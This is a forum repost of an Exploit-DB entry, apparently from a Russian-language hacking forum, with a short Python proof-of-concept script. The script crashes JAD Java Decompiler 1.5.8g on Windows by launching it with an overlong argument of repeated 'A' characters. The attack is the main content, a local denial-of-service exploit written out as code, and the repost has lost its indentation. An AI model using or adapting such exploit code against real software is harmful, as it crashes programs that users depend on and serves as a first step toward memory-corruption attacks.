Exploit JAD java Decompiler 1.5.8g - 'argument' Local Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11669
Проверка EDB
  1. Пройдено
Автор
L3D
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-03-09
Код:
#!/usr/bin/env python
#JAD java decompiler 1.5.8g (argument) Local Crash
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: [email protected]

#The software crashes when it gets an argument that is between 0x1fc9 to 0x1fdc bytes.

from random import randint
import os, sys

if len(sys.argv) != 1:
path=sys.argv[1]
else:
path='jad.exe'

if not os.path.exists(path):
print 'Usage: python %s [path to jad.exe]' % sys.argv[0]
exit(-1)

evil='A'*randint(0x1fc9, 0x1fdc)
os.execl(path, path, evil)
 
Источник
www.exploit-db.com

Похожие темы